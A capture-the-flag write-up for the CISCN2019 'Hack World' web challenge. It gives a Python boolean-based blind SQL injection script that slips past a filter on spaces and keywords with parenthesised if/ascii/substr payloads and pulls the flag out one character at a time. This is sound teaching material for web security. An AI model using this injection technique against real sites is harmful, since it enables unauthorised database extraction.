[CISCN2019 华北赛区 Day2 Web1]Hack World
Key points
- fuzzing
- Python blind-injection script
Walkthrough
Fuzz it a bit
The page is a single search box. Submitting 1 or 2 returns a result (the two ids produce different pages, and only id=1 contains "Hello"); anything else returns bool(false). The filter blocks union, and, or, whitespace and a few other tokens, so the payload below avoids spaces by wrapping every token in parentheses and uses `if(cond,1,2)` as a boolean oracle: the response contains "Hello" exactly when cond holds.
The script:
import requests

url = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php"
result = ""
num = 0  # set to 1 once the closing brace of the flag has been seen

for i in range(1, 60):
    if num == 1:
        break
    for j in range(32, 128):
        # No spaces (they are filtered): every token is wrapped in parentheses.
        # if(cond,1,2): id=1 prints the "Hello" page, id=2 prints a different one.
        payload = "if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)" % (i, j)
        # print(str((i-1)*96+j-32)+":~"+payload+"~")
        data = {
            "id": payload,
        }
        r = requests.post(url, data=data)
        r.encoding = r.apparent_encoding
        if "Hello" in r.text:  # condition true -> the i-th byte of the flag is chr(j)
            x = chr(j)
            result += str(x)
            print(result)
            break
    if "}" in result:
        print(result)
        num = 1
        break